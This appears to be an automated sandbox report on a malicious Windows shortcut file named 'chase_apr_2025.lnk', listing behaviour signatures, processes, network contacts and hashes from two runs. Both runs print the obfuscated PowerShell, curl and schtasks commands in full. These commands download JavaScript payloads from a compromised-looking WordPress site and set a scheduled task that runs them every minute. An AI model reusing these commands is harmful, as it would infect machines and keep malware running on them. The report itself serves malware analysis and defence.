Analysis Overview
SHA256
09ef17dc4284a8d1a8b937354bd8137aa9c0d98bffb897bd891ccff854484e43
Threat Level: Likely malicious
The file chase_apr_2025.lnk was found to be: Likely malicious.
Malicious Activity Summary
Blocklisted process makes network request
Checks computer location settings
Command and Scripting Interpreter: PowerShell
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Scheduled Task/Job: Scheduled Task
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V16
Analysis: static1
Detonation Overview
Reported
2025-04-18 17:49
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2025-04-18 17:49
Reported
2025-04-18 17:50
Platform
win10v2004-20250410-en
Max time kernel
41s
Max time network
40s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2645532622-3298555945-705856666-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 112 wrote to memory of 4204 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 112 wrote to memory of 4204 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4204 wrote to memory of 4776 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\curl.exe |
| PID 4204 wrote to memory of 4776 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\curl.exe |
| PID 4204 wrote to memory of 4704 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\schtasks.exe |
| PID 4204 wrote to memory of 4704 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\schtasks.exe |
Uses Task Scheduler COM API
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\chase_apr_2025.lnk
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $affl = $env:programdata + '\' + ('2qr3mg7cssz4nr.js yxliyx19s'); $getf='D'+'ow'+'nl'+'oadF'+'ile'; $t670luhhb7i6w = New-Object Net.WebClient; $wscs = 'wscript '; $t670luhhb7i6w.$getf('https://rietiholidays.it/wp-content/uploads/2021/06/unprojectingsJX.php', '2qr3mg7cssz4nr.js'); . ('cu'+'rl.e'+'xe') -s -o zqd1lm17ezgl 'https://rietiholidays.it/wp-content/uploads/2021/06/covalencesxjiY.php'; mv zqd1lm17ezgl 'yxliyx19s.js'; . ('sc'+'hta'+'s'+'ks') /create /sc minute /mo 1 /f /tr ($wscs + $affl) /tn yxliyx19s;
C:\Windows\system32\curl.exe
"C:\Windows\system32\curl.exe" -s -o zqd1lm17ezgl https://rietiholidays.it/wp-content/uploads/2021/06/covalencesxjiY.php
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\ProgramData\2qr3mg7cssz4nr.js yxliyx19s" /tn yxliyx19s
C:\Windows\system32\wscript.EXE
C:\Windows\system32\wscript.EXE C:\ProgramData\2qr3mg7cssz4nr.js yxliyx19s
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | rietiholidays.it | udp |
| IT | 185.81.1.167:443 | rietiholidays.it | tcp |
| US | 8.8.8.8:53 | www.rietiholidays.it | udp |
| IT | 185.81.1.167:443 | www.rietiholidays.it | tcp |
| IT | 185.81.1.167:443 | www.rietiholidays.it | tcp |
| US | 8.8.8.8:53 | r10.o.lencr.org | udp |
| GB | 2.22.144.149:80 | r10.o.lencr.org | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
Files
memory/4204-2-0x00007FFB4BFC3000-0x00007FFB4BFC5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pk4kxzrp.xao.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4204-12-0x000002257AC20000-0x000002257AC42000-memory.dmp
memory/4204-13-0x00007FFB4BFC0000-0x00007FFB4CA81000-memory.dmp
memory/4204-14-0x00007FFB4BFC0000-0x00007FFB4CA81000-memory.dmp
memory/4204-15-0x00007FFB4BFC0000-0x00007FFB4CA81000-memory.dmp
C:\ProgramData\zqd1lm17ezgl
| MD5 | 6f2c98b320a97239e18b95658d60ac75 |
| SHA1 | 19b01f664642846c84e02cf0c07a61d4bf8785cd |
| SHA256 | 7729e82cf6e68f42e11257e678e08e28e3dd3597033bed67f206e04623c8d166 |
| SHA512 | c65cedea9760d2dc9fc150ba1a3303f212295984fbaebe718a81acf498090893a07201f5cc6e05af27597d2e826d482fce2ff546285e25a90780ad1675daa500 |
memory/4204-20-0x00007FFB4BFC0000-0x00007FFB4CA81000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2025-04-18 17:49
Reported
2025-04-18 17:50
Platform
win11-20250410-en
Max time kernel
36s
Max time network
4s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2920 wrote to memory of 2168 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2920 wrote to memory of 2168 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2168 wrote to memory of 4872 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\curl.exe |
| PID 2168 wrote to memory of 4872 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\curl.exe |
| PID 2168 wrote to memory of 4940 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\schtasks.exe |
| PID 2168 wrote to memory of 4940 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\schtasks.exe |
Uses Task Scheduler COM API
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\chase_apr_2025.lnk
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $affl = $env:programdata + '\' + ('2qr3mg7cssz4nr.js yxliyx19s'); $getf='D'+'ow'+'nl'+'oadF'+'ile'; $t670luhhb7i6w = New-Object Net.WebClient; $wscs = 'wscript '; $t670luhhb7i6w.$getf('https://rietiholidays.it/wp-content/uploads/2021/06/unprojectingsJX.php', '2qr3mg7cssz4nr.js'); . ('cu'+'rl.e'+'xe') -s -o zqd1lm17ezgl 'https://rietiholidays.it/wp-content/uploads/2021/06/covalencesxjiY.php'; mv zqd1lm17ezgl 'yxliyx19s.js'; . ('sc'+'hta'+'s'+'ks') /create /sc minute /mo 1 /f /tr ($wscs + $affl) /tn yxliyx19s;
C:\Windows\system32\curl.exe
"C:\Windows\system32\curl.exe" -s -o zqd1lm17ezgl https://rietiholidays.it/wp-content/uploads/2021/06/covalencesxjiY.php
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\ProgramData\2qr3mg7cssz4nr.js yxliyx19s" /tn yxliyx19s
C:\Windows\system32\wscript.EXE
C:\Windows\system32\wscript.EXE C:\ProgramData\2qr3mg7cssz4nr.js yxliyx19s
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | rietiholidays.it | udp |
| IT | 185.81.1.167:443 | www.rietiholidays.it | tcp |
| IT | 185.81.1.167:443 | www.rietiholidays.it | tcp |
| IT | 185.81.1.167:443 | www.rietiholidays.it | tcp |
| GB | 2.22.144.142:80 | r10.o.lencr.org | tcp |
| N/A | 127.0.0.1:59468 | tcp |
Files
memory/2168-2-0x00007FF8A8853000-0x00007FF8A8855000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f0bguvcx.nlb.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2168-11-0x0000025352440000-0x0000025352462000-memory.dmp
memory/2168-12-0x00007FF8A8850000-0x00007FF8A9312000-memory.dmp
memory/2168-13-0x00007FF8A8850000-0x00007FF8A9312000-memory.dmp
memory/2168-14-0x00007FF8A8850000-0x00007FF8A9312000-memory.dmp
C:\ProgramData\zqd1lm17ezgl
| MD5 | 6f2c98b320a97239e18b95658d60ac75 |
| SHA1 | 19b01f664642846c84e02cf0c07a61d4bf8785cd |
| SHA256 | 7729e82cf6e68f42e11257e678e08e28e3dd3597033bed67f206e04623c8d166 |
| SHA512 | c65cedea9760d2dc9fc150ba1a3303f212295984fbaebe718a81acf498090893a07201f5cc6e05af27597d2e826d482fce2ff546285e25a90780ad1675daa500 |
memory/2168-19-0x00007FF8A8850000-0x00007FF8A9312000-memory.dmp